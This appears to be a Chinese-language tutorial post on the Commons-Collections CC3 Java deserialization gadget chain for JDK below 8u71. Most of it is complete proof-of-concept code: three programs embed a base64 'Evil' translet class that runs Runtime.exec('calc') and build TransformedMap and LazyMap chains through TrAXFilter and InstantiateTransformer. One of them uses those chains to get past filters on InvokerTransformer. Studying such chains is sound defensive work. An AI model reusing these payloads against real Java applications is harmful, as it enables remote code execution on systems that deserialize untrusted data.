CC3同样要求JDK版本在8u71以下

我们可以将TemplatesImpl加载字节码的特性来改造一下CC1

一个小demo

 public static void main(String[] args) throws Exception {
    TemplatesImpl obj = new TemplatesImpl();
    byte[] code = Base64.getDecoder().decode("yv66vgAAADQALAoABgAeCgAfACAIACEKAB8AIgcAIwcAJAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAGTEV2aWw7AQAKRXhjZXB0aW9ucwcAJQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsHACYBAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEAClNvdXJjZUZpbGUBAAlFdmlsLmphdmEMAAcACAcAJwwAKAApAQAEY2FsYwwAKgArAQAERXZpbAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAUABgAAAAAAAwABAAcACAACAAkAAABAAAIAAQAAAA4qtwABuAACEgO2AARXsQAAAAIACgAAAA4AAwAAAAoABAALAA0ADAALAAAADAABAAAADgAMAA0AAAAOAAAABAABAA8AAQAQABEAAgAJAAAAPwAAAAMAAAABsQAAAAIACgAAAAYAAQAAABAACwAAACAAAwAAAAEADAANAAAAAAABABIAEwABAAAAAQAUABUAAgAOAAAABAABABYAAQAQABcAAgAJAAAASQAAAAQAAAABsQAAAAIACgAAAAYAAQAAABUACwAAACoABAAAAAEADAANAAAAAAABABIAEwABAAAAAQAYABkAAgAAAAEAGgAbAAMADgAAAAQAAQAWAAEAHAAAAAIAHQ==");
    setFieldValue(obj, "_bytecodes", new byte[][] {code});
    setFieldValue(obj,"_name","xux");
    setFieldValue(obj,"_tfactory",new TransformerFactoryImpl());
    Transformer[] transformers = new Transformer[]
    {
     new ConstantTransformer(obj),
     new InvokerTransformer("newTransformer",null,null)
    };
    Transformer chainedTransformer = new ChainedTransformer(transformers);
    Map innerMap = new HashMap();
    Map outerMap = TransformedMap.decorate(innerMap,chainedTransformer,null);
    outerMap.put("114","514");
  }
  public static void setFieldValue(Object obj,String filename,Object value) throws Exception {
    Field field = obj.getClass().getDeclaredField(filename);
    field.setAccessible(true);
    field.set(obj,value);
  }

但是CC3链的目的是为了绕过一些规则对InvokerTransformer的限制,CC3并没有用到InvokerTransformer来调用任意方法,而是利用到了另一个类,

com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter

1.jpg

这个类的构造函数中调用了(TransformerImpl) templates.newTransformer(),免去了我们用InvokerTransformer手工调用newTransformer()方法这一步

但是缺少了InvokerTransformer,TrAXFilter的构造方法也是无法调用的。这里用到了一个新的Transformer,即org.apache.commons.collections.functors.InstantiateTransformer

InstantiateTransformer也是一个实现了Transformer接口的类

public class InstantiateTransformer implements Transformer, Serializable {
  private static final long serialVersionUID = 3786388740793356347L;
  public static final Transformer NO_ARG_INSTANCE = new InstantiateTransformer();
  private final Class[] iParamTypes;
  private final Object[] iArgs;

  public static Transformer getInstance(Class[] paramTypes, Object[] args) {
    if (paramTypes == null && args != null || paramTypes != null && args == null || paramTypes != null && args != null && paramTypes.length != args.length) {
      throw new IllegalArgumentException("Parameter types must match the arguments");
    } else if (paramTypes != null && paramTypes.length != 0) {
      paramTypes = (Class[])((Class[])paramTypes.clone());
      args = (Object[])((Object[])args.clone());
      return new InstantiateTransformer(paramTypes, args);
    } else {
      return NO_ARG_INSTANCE;
    }
  }

  private InstantiateTransformer() {
    this.iParamTypes = null;
    this.iArgs = null;
  }

  public InstantiateTransformer(Class[] paramTypes, Object[] args) {
    this.iParamTypes = paramTypes;
    this.iArgs = args;
  }

  public Object transform(Object input) {
    try {
      if (!(input instanceof Class)) {
        throw new FunctorException("InstantiateTransformer: Input object was not an instanceof Class, it was a " + (input == null ? "null object" : input.getClass().getName()));
      } else {
        Constructor con = ((Class)input).getConstructor(this.iParamTypes);
        return con.newInstance(this.iArgs);
      }
    } catch (NoSuchMethodException var3) {
      throw new FunctorException("InstantiateTransformer: The constructor must exist and be public ");
    } catch (InstantiationException var4) {
      throw new FunctorException("InstantiateTransformer: InstantiationException", var4);
    } catch (IllegalAccessException var5) {
      throw new FunctorException("InstantiateTransformer: Constructor must be public", var5);
    } catch (InvocationTargetException var6) {
      throw new FunctorException("InstantiateTransformer: Constructor threw an exception", var6);
    }
  }
}

他的transform方法利用反射调用了构造函数

最终Poc:

public static void main(String[] args) throws Exception {
    TemplatesImpl obj = new TemplatesImpl();
    byte[] code = Base64.getDecoder().decode("yv66vgAAADQALAoABgAeCgAfACAIACEKAB8AIgcAIwcAJAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAGTEV2aWw7AQAKRXhjZXB0aW9ucwcAJQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsHACYBAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEAClNvdXJjZUZpbGUBAAlFdmlsLmphdmEMAAcACAcAJwwAKAApAQAEY2FsYwwAKgArAQAERXZpbAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAUABgAAAAAAAwABAAcACAACAAkAAABAAAIAAQAAAA4qtwABuAACEgO2AARXsQAAAAIACgAAAA4AAwAAAAoABAALAA0ADAALAAAADAABAAAADgAMAA0AAAAOAAAABAABAA8AAQAQABEAAgAJAAAAPwAAAAMAAAABsQAAAAIACgAAAAYAAQAAABAACwAAACAAAwAAAAEADAANAAAAAAABABIAEwABAAAAAQAUABUAAgAOAAAABAABABYAAQAQABcAAgAJAAAASQAAAAQAAAABsQAAAAIACgAAAAYAAQAAABUACwAAACoABAAAAAEADAANAAAAAAABABIAEwABAAAAAQAYABkAAgAAAAEAGgAbAAMADgAAAAQAAQAWAAEAHAAAAAIAHQ==");
    setFieldValue(obj, "_bytecodes", new byte[][] {code});
    setFieldValue(obj,"_name","xux");
    setFieldValue(obj,"_tfactory",new TransformerFactoryImpl());
    Transformer[] transformers = new Transformer[]
    {
     new ConstantTransformer(TrAXFilter.class),
     new InstantiateTransformer(
         new Class[]{Templates.class},
         new Object[]{obj}
     )
    };
    Transformer[] fakeTransformers = new Transformer[]{new ConstantTransformer(1)};
    Transformer chainedTransformer = new ChainedTransformer(fakeTransformers);
    Map innerMap = new HashMap();
    Map outerMap = TransformedMap.decorate(innerMap,null,chainedTransformer);
    outerMap.put("value","114514");
    Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
    Constructor constructor = c.getDeclaredConstructor(Class.class,Map.class);
    constructor.setAccessible(true);
    Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
    f.setAccessible(true);
    f.set(chainedTransformer,transformers);
    Object o = constructor.newInstance(Target.class,outerMap);
    serialize(o);
    unserialize();
  }
  public static void setFieldValue(Object obj,String filename,Object value) throws Exception {
    Field field = obj.getClass().getDeclaredField(filename);
    field.setAccessible(true);
    field.set(obj,value);
  }
  public static void serialize(Object obj) throws IOException {
    ObjectOutput oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
    oos.writeObject(obj);
  }
  public static Object unserialize() throws IOException, ClassNotFoundException {
    ObjectInputStream ois = new ObjectInputStream(new FileInputStream("ser.bin"));
    Object obj = ois.readObject();
    return obj;
  }

也可以使用LazyMap

public static void main(String[] args) throws Exception {
    TemplatesImpl obj = new TemplatesImpl();
    byte[] code = Base64.getDecoder().decode("yv66vgAAADQALAoABgAeCgAfACAIACEKAB8AIgcAIwcAJAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAGTEV2aWw7AQAKRXhjZXB0aW9ucwcAJQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsHACYBAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEAClNvdXJjZUZpbGUBAAlFdmlsLmphdmEMAAcACAcAJwwAKAApAQAEY2FsYwwAKgArAQAERXZpbAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAUABgAAAAAAAwABAAcACAACAAkAAABAAAIAAQAAAA4qtwABuAACEgO2AARXsQAAAAIACgAAAA4AAwAAAAoABAALAA0ADAALAAAADAABAAAADgAMAA0AAAAOAAAABAABAA8AAQAQABEAAgAJAAAAPwAAAAMAAAABsQAAAAIACgAAAAYAAQAAABAACwAAACAAAwAAAAEADAANAAAAAAABABIAEwABAAAAAQAUABUAAgAOAAAABAABABYAAQAQABcAAgAJAAAASQAAAAQAAAABsQAAAAIACgAAAAYAAQAAABUACwAAACoABAAAAAEADAANAAAAAAABABIAEwABAAAAAQAYABkAAgAAAAEAGgAbAAMADgAAAAQAAQAWAAEAHAAAAAIAHQ==");
    setFieldValue(obj, "_bytecodes", new byte[][] {code});
    setFieldValue(obj,"_name","xux");
    setFieldValue(obj,"_tfactory",new TransformerFactoryImpl());
    Transformer[] transformers = new Transformer[]
    {
     new ConstantTransformer(TrAXFilter.class),
     new InstantiateTransformer(
         new Class[]{Templates.class},
         new Object[]{obj}
     )
    };
    Transformer[] fakeTransformers = new Transformer[]{new ConstantTransformer(1)};
    Transformer chainedTransformer = new ChainedTransformer(fakeTransformers);
    Map innerMap = new HashMap();
    Map outerMap = LazyMap.decorate(innerMap,chainedTransformer);
    Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
    Constructor constructor = c.getDeclaredConstructor(Class.class,Map.class);
    constructor.setAccessible(true);
    InvocationHandler handler = (InvocationHandler) constructor.newInstance(Override.class,outerMap);
    Map proxyMap = (Map) Proxy.newProxyInstance(LazyMap.class.getClassLoader(),new Class[]{Map.class},handler);
    Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
    f.setAccessible(true);
    f.set(chainedTransformer,transformers);
    Object o = constructor.newInstance(Override.class,proxyMap);
    serialize(o);
    unserialize();
  }
  public static void setFieldValue(Object obj,String filename,Object value) throws Exception {
    Field field = obj.getClass().getDeclaredField(filename);
    field.setAccessible(true);
    field.set(obj,value);
  }
  public static void serialize(Object obj) throws IOException {
    ObjectOutput oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
    oos.writeObject(obj);
  }
  public static Object unserialize() throws IOException, ClassNotFoundException {
    ObjectInputStream ois = new ObjectInputStream(new FileInputStream("ser.bin"));
    Object obj = ois.readObject();
    return obj;
  }